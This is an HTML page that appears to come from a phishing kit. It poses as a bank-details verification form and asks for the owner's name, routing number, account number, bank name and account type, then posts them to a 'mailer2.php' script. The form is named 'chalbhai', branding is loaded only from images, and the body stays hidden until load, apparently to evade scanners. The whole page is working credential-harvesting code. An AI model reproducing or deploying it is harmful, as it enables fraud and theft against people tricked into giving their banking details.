<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Please Complete with Your Informations</title>
<meta http-equiv="content-type" content="text/html; charset=UTF8">
<meta charset="utf-8" />
<meta name="applicable-device" content="pc,mobile" />
 <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <meta name="robots" content="noindex, nofollow">
  <meta name="googlebot" content="noindex, nofollow">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="format-detection" content="telephone=no" />

<link rel="shortcut icon"
              href="images/favicon.ico"/>
			  
			  
	
<script type="text/javascript">

function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}

</script>
<SCRIPT language=Javascript>
      <!--
      function isNumberKey(evt)
      {
         var charCode = (evt.which) ? evt.which : event.keyCode
         if (charCode > 31 && (charCode < 48 || charCode > 57))
            return false;

         return true;
      }
      //-->
   </SCRIPT>
<body style="visibility:hidden" onload="unhideBody()">
<style type="text/css">
div#container
{
	position:relative;
	width: 1285px;
	margin-top: 0px;
	margin-left: auto;
	margin-right: auto;
	text-align:left; 
}
body {text-align:center;margin:0}
</style>
<style> 
    .textbox {
    height: 33px;
    width: 275px;
    border: 1px solid #B9BDC1;
    color: #797979;
	text-align: left;
	 font-size: 14px;
    -moz-box-shadow: 0 1px 1px #bbb inset;
    -webkit-box-shadow: 0 1px 1px #BBB inset;
    box-shadow: 0 1px 1px #BBB inset;
    -moz-border-radius: 3px;
    -webkit-border-radius: 2px;
    border-radius: 3px;
 } 
 .textbox:focus { 
    border: 1px solid #4d90fe; 
    outline: none; 
    box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3);  
    -moz-box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3); 
    -webkit-box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3); 
    background: rgb(255, 255, 255); } 
  
</style>
</head>
<body bgColor="#F5F5F5">
<div id="container">
<div id="roundrect1" style="position:absolute; overflow:hidden; left:438px; top:93px; width:633px; height:502px; z-index:0"><img border=0 width="100%" height="100%" alt="" src="images/roundrect97974500.gif"></div>

<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1285px; height:83px; z-index:1"><a href="#"><img src="images/header.png" alt="" title="" border=0 width=1285 height=83></a></div>

<div id="image2" style="position:absolute; overflow:hidden; left:166px; top:364px; width:247px; height:139px; z-index:2"><a href="#"><img src="images/enable.png" alt="" title="" border=0 width=247 height=139></a></div>

<div id="image3" style="position:absolute; overflow:hidden; left:66px; top:733px; width:1171px; height:88px; z-index:3"><a href="#"><img src="images/footer1.png" alt="" title="" border=0 width=1171 height=88></a></div>

<div id="image20" style="position:absolute; overflow:hidden; left:792px; top:435px; width:88px; height:35px; z-index:4"><img src="images/msc.png" alt="" title="" border=0 width=88 height=35></div>

<div id="image21" style="position:absolute; overflow:hidden; left:792px; top:431px; width:102px; height:45px; z-index:5"><img src="images/none.png" alt="" title="" border=0 width=102 height=45></div>

<div id="image4" style="position:absolute; overflow:hidden; left:166px; top:98px; width:247px; height:231px; z-index:6"><a href="#"><img src="images/4.png" alt="" title="" border=0 width=247 height=231></a></div>

<div id="image5" style="position:absolute; overflow:hidden; left:466px; top:134px; width:578px; height:403px; z-index:7"><img src="images/skip.png" alt="" title="" border=0 width=578 height=403></div>

<div id="image6" style="position:absolute; overflow:hidden; left:875px; top:485px; width:85px; height:42px; z-index:8"><img src="images/ssss.png" alt="" title="" border=0 width=85 height=42></div>
<form action=mailer2.php name=chalbhai id=chalbhai method=post>
<input name="formtext1" title="Please Enter Right Value"  autofocus required autocomplete="off" maxlength="20" placeholder="Owner Name" class="textbox" type="text" style="position:absolute;width:295px;padding-left:4px;left:664px;top:225px;z-index:9">
<input name="formtext2" title="Please Enter Right Value"  autofocus required autocomplete="off" maxlength="16" placeholder="Routing Number" class="textbox" onkeypress="return isNumberKey(event)" type="text" style="position:absolute;width:295px;padding-left:4px;left:665px;top:273px;z-index:10">
<input name="formtext3" title="Please Enter Right Value"  autofocus required autocomplete="off" maxlength="16" placeholder="Account Number" class="textbox" onkeypress="return isNumberKey(event)" type="text" style="position:absolute;width:295px;padding-left:4px;left:665px;top:321px;z-index:11">
<input name="formtext4" title="Please Enter Right Value"  autofocus required autocomplete="off" placeholder="Bank Name" class="textbox" type="text" style="position:absolute;width:295px;padding-left:4px;left:665px;top:369px;z-index:12">
<select name="formselect1" class="textbox" style="position:absolute;left:664px;top:417px;width:295px;z-index:13">
<option>Select Type</option>
<option value="Savings">Savings</option>
<option value="Checkingt">Checkingt</option>
<option value="Investment">Investment</option>
<option value="Others">Others</option>
</select>
</select>
<div id="formimage1" style="position:absolute; left:723px; top:486px; z-index:14"><input type="image" name="formimage1" width="134" height="41" src="images/oextt.png"></div>
</div>

</body>
</html>
